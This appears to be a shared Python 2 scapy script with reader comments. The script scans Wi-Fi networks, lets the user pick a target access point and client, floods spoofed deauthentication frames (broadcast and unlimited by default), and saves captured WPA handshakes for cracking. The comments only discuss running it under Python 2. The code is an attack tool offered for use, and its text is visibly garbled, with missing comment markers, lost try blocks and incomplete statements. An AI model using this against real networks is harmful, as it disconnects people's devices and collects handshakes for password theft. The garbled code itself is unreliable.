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Python Networking Wifi Deauth Attack
import argparse
from multiprocessing import Process
import logging
from scapy.all import *
import signal
import threading
from sys import platform
OSX Devices
networksetup -listallhardwareports
Capture Hand Shake
class CaptureHandShake():
def __init__(self, iface):
self.wpa_handshake = []
self.iface = iface
self.acceptAny = False
self.packetMax = 100
self.packetCount = 0
Handle the packets
def handle_packet(self, packet):
if self.acceptAny == True:
print packet.summary()
self.packetCount += 1
if self.packetCount == self.packetMax:
filename = "pcaps/wpa-handshake-" + str("%Y-%m-%d-%H-%M-%S")) + ".pcap"
wrpcap(filename, self.wpa_handshake)
self.wpa_handshake = []
self.acceptAny = False
self.packetCount = 0
#got EAPOL KEY packet
if (packet.haslayer(EAPOL) and packet.type == 2) or self.acceptAny == True:
print packet.summary()
#if we have 4 packets
if len(self.wpa_handshake) >= 4:
self.acceptAny = True
print "\n"
print '='*100
print "\n"
Start the sniffer
def start(self):
print '='*100
print "Sniffing on interface: " + self.iface
print '='*100
sniff(iface=self.iface, prn=self.handle_packet)
Deauth Attack Class
class deauth:
Deauth class constructor
def __init__(self, interface):
self.interface = interface
self.networks = {}
self.stop_sniff = False
self.signal = signal
self.channel_hop = None
self.target_bssid = ""
self.interupted = False
self.listenKeyboard = None
Turn on monitor mode
def monitorMode(self):
os.system("ifconfig " + self.interface + " down")
os.system("iwconfig " + self.interface + " mode monitor")
os.system("ifconfig " + self.interface + " up")
Start the network sniffer
def start_sniffer(self):
print '='*100
print "\nPress CTRL+c to stop sniffing..\n"
print '='*100 + '\n{0:5}\t{1:30}\t{2:30}\n'.format('Channel','ESSID','BSSID') + '='*100
channel_hop = Process(target = self.channel_hopper, args=(self.interface,))
stopsniff = False
sniff( lfilter = lambda x: (x.haslayer(Dot11Beacon) or x.haslayer(Dot11ProbeResp)), stop_filter=stopsniff, prn=lambda x: self.add_network(x) )
while True:
except KeyboardInterrupt:
stopsniff = True
Swicth wifi channels
def channel_hopper(self, interface):
while True:
channel = random.randrange(1,13)
os.system("iwconfig %s channel %d" % (interface, channel))
except KeyboardInterrupt:
Add a found network to the list
def add_network(self, pckt):
essid = pckt[Dot11Elt].info if '\x00' not in pckt[Dot11Elt].info and pckt[Dot11Elt].info != '' else 'Hidden SSID'
bssid = pckt[Dot11].addr3
channel = int(ord(pckt[Dot11Elt:3].info))
if bssid not in self.networks:
self.networks[bssid] = ( essid, channel )
print "{0:5}\t{1:30}\t{2:30}".format(channel, essid, bssid)
Stop hopping channels
def stop_channel_hop(self, signal, frame):
self.stop_sniff = True
Stop the niff
def keep_sniffing(self, pckt):
return self.stop_sniff
Send Deauth packets
def perform_deauth(self, bssid, client, count):
pckt = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
cli_to_ap_pckt = None
if client != 'FF:FF:FF:FF:FF:FF' : cli_to_ap_pckt = Dot11(addr1=bssid, addr2=client, addr3=bssid) / Dot11Deauth()
print 'Sending Deauth to ' + client + ' from ' + bssid
if not count:
print 'Press CTRL+C to quit'
count = int(count)
while count != 0:
for i in range(64):
# Send out deauth from the AP
# If we're targeting a client, we will also spoof deauth from the client to the AP
if client != 'FF:FF:FF:FF:FF:FF': send(cli_to_ap_pckt)
# If count was -1, this will be an infinite loop
count -= 1
except KeyboardInterrupt:
Get the target to attack
def getTarget(self):
print "\n\n"
print '='*100
target_bssid = raw_input('\nEnter a BSSID to perform an deauth attack (q to quit): ')
self.target_bssid = target_bssid
while target_bssid not in self.networks:
target_bssid = raw_input('\nEnter a BSSID to perform an deauth attack (q to quit): ')
self.target_bssid = target_bssid
if target_bssid == 'q':
# Get our interface to the correct channel
print 'Changing ' + self.interface + ' to channel ' + str(self.networks[target_bssid][1])
os.system("iwconfig %s channel %d" % (self.interface, self.networks[target_bssid][1]))
print "\n\n"
print '='*100
Loop for client packets on the selected channel
def sniffClients(self):
interupted = False
sniff(iface=self.interface, prn=self.getClients, stop_filter=interupted )
while True:
except KeyboardInterrupt:
interupted = True
Get the clients for the BSSID
def getClients(self, pkt):
bssid = pkt[Dot11].addr3
target_bssid = self.target_bssid
if target_bssid == bssid and not pkt.haslayer(Dot11Beacon) and not pkt.haslayer(Dot11ProbeReq) and not pkt.haslayer(Dot11ProbeResp):
print pkt.summary()
Packet Info
def pktInfo(self, pkt):
bssid = pkt[Dot11].addr3
p = pkt[Dot11Elt]
cap = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}""{Dot11ProbeResp:%Dot11ProbeResp.cap%}").split('+')
ssid, channel = None, None
crypto = set()
while isinstance(p, Dot11Elt):
if p.ID == 0:
ssid =
elif p.ID == 3:
channel = ord(
elif p.ID == 48:
elif p.ID == 221 and'\x00P\xf2\x01\x01\x00'):
p = p.payload
if not crypto:
if 'privacy' in cap:
print " %r [%s], %s" % (ssid, bssid,' / '.join(crypto) )
Attack the target
def attackTarget(self):
print "\n\n"
print '='*100
# Now we have a bssid that we have detected, let's get the client MAC
target_client = raw_input('Enter a client MAC address (Default: FF:FF:FF:FF:FF:FF): ')
if not target_client: target_client = 'FF:FF:FF:FF:FF:FF'
deauth_pckt_count = raw_input('Number of deauth packets (Default: -1 [constant]): ')
print "\n\n"
print '='*100
if not deauth_pckt_count:
deauth_pckt_count = -1
self.perform_deauth(self.target_bssid, target_client, deauth_pckt_count)
def main():
Set the command line options
parser = argparse.ArgumentParser( description=' - Perform a Deauth WIFI Attack - python -i wlan0 -m 1')
parser.add_argument('-i', '--interface', dest='iface', type=str, required=True, help='WIFI Interface')
parser.add_argument('-m', '--monitormode', dest='monitor', type=str, required=False, help='Activate Monitor Mode')
Get the command line options
args = parser.parse_args()
conf.iface = args.iface
Create the deauth class and begin the attack
#create class instance
de = deauth(args.iface)
# if turn on monitor mode
if args.monitor != "" and args.monitor != None:
#start the ssid sniffer
#choose target
#sniff for client mac's
#attack the target
#capture the handshake packets
sn = CaptureHandShake(args.iface)
if __name__ == "__main__":
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So what do you enter after the -i ?

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The interface, wlan0 ?

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Dapi314 commented Jan 12, 2021

Am I doing something wrong?

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Am I doing something wrong?

This script is made for python 2. You're probably trying to run the script with python3. If you have python 2, please use it instead of python 3. If you don't have it, go ahead and install it

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Am I doing something wrong?

I think line 38 should be this:

not this:
print packet.summary()

You're wrong, but it might work

You're wrong because this script is made for python 2, and not python 3. Python 2 != Python 3. But changing a few lines might make it work in python 3

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